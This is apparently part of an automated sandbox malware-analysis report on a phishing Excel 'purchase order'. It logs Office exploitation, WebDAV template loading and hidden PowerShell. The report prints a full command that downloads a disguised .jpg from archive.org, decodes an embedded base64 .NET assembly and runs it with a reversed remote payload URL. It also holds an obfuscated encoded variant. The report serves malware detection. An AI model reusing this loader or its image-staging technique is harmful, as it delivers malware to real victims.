            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: 5B430000.0.drInitial sample: OLE indicators vbamacros = False
            Source: Mac Purchase Order PO102935.xlsInitial sample: OLE indicators encrypted = True

            Data Obfuscation

            barindex
            Suspicious powershell command line found
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
            Source: sqlite3.dll.13.drStatic PE information: section name: /4
            Source: sqlite3.dll.13.drStatic PE information: section name: /19
            Source: sqlite3.dll.13.drStatic PE information: section name: /31
            Source: sqlite3.dll.13.drStatic PE information: section name: /45
            Source: sqlite3.dll.13.drStatic PE information: section name: /57
            Source: sqlite3.dll.13.drStatic PE information: section name: /70
            Source: sqlite3.dll.13.drStatic PE information: section name: /81
            Source: sqlite3.dll.13.drStatic PE information: section name: /92
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_0062F2D6 push eax; ret 5_2_0062F2D7
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_006303DA push eax; ret 5_2_006303DB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_0062BC88 push edx; retf 0002h5_2_0062BC91
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_006125E2 push ebx; retf 10_2_006125EA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_006121C8 push ebx; iretd 10_2_006121EA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00612DA5 pushad ; ret 10_2_00612DA9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00612DB0 pushfd ; ret 10_2_00612DB9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407052 push cs; retf 11_2_00407057
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004179B3 push eax; iretd 11_2_004179B4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00403260 push eax; ret 11_2_00403262
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040820F push edx; retf 11_2_00408210
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040A213 push edi; iretd 11_2_0040A21D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00414226 push esp; ret 11_2_00414227
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004152E7 push edi; iretd 11_2_004152E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00408350 push eax; ret 11_2_00408353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00413C34 pushad ; retf 11_2_00413C3A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041E4CA push 0000003Bh; ret 11_2_0041E4CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00417D52 push es; retf 11_2_00417D53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00411F2E push edx; iretd 11_2_00411F35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041A7CA push FFFFFFC3h; retf 11_2_0041A7F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022BDFA1 push ecx; ret 11_2_022BDFB4
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028C2A15 push cs; retf 12_2_028C2A1A
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028C3BD2 push edx; retf 12_2_028C3BD3
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028CFBE9 push esp; ret 12_2_028CFBEA
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028D3376 push eax; iretd 12_2_028D3377
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028CD8F1 push edx; iretd 12_2_028CD8F8
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028D618D push FFFFFFC3h; retf 12_2_028D61B4
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028D3715 push es; retf 12_2_028D3716
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028D0CAA push edi; iretd 12_2_028D0CAB
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028CFCD2 push esp; retf 12_2_028CFCD3
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028CF5EF push edx; retf 12_2_028CF5F0

            Persistence and Installation Behavior

            barindex
            Microsoft Office launches external ms-search protocol handler (WebDAV)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\jiourl.com@SSL\DavWWWRootJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\jiourl.com@SSL\DavWWWRootJump to behavior
            AI detected suspicious Excel or Word document
            Source: Office documentLLM: Score: 9 Reasons: The screenshot shows a visually prominent message with the Microsoft Office logo stating 'This document is protected'. This type of message is often used to create a sense of urgency or necessity to click on a link to view the document. The presence of a well-known brand (Microsoft Office) adds to the credibility and can mislead users into believing the document is legitimate. The context of the document being an invoice further increases the likelihood of the user wanting to access it urgently. These factors combined indicate a high risk of phishing or malware.
            Office drops RTF file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc.0.drJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 1288490C.doc.3.drJump to dropped file
            Office viewer loads remote template
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
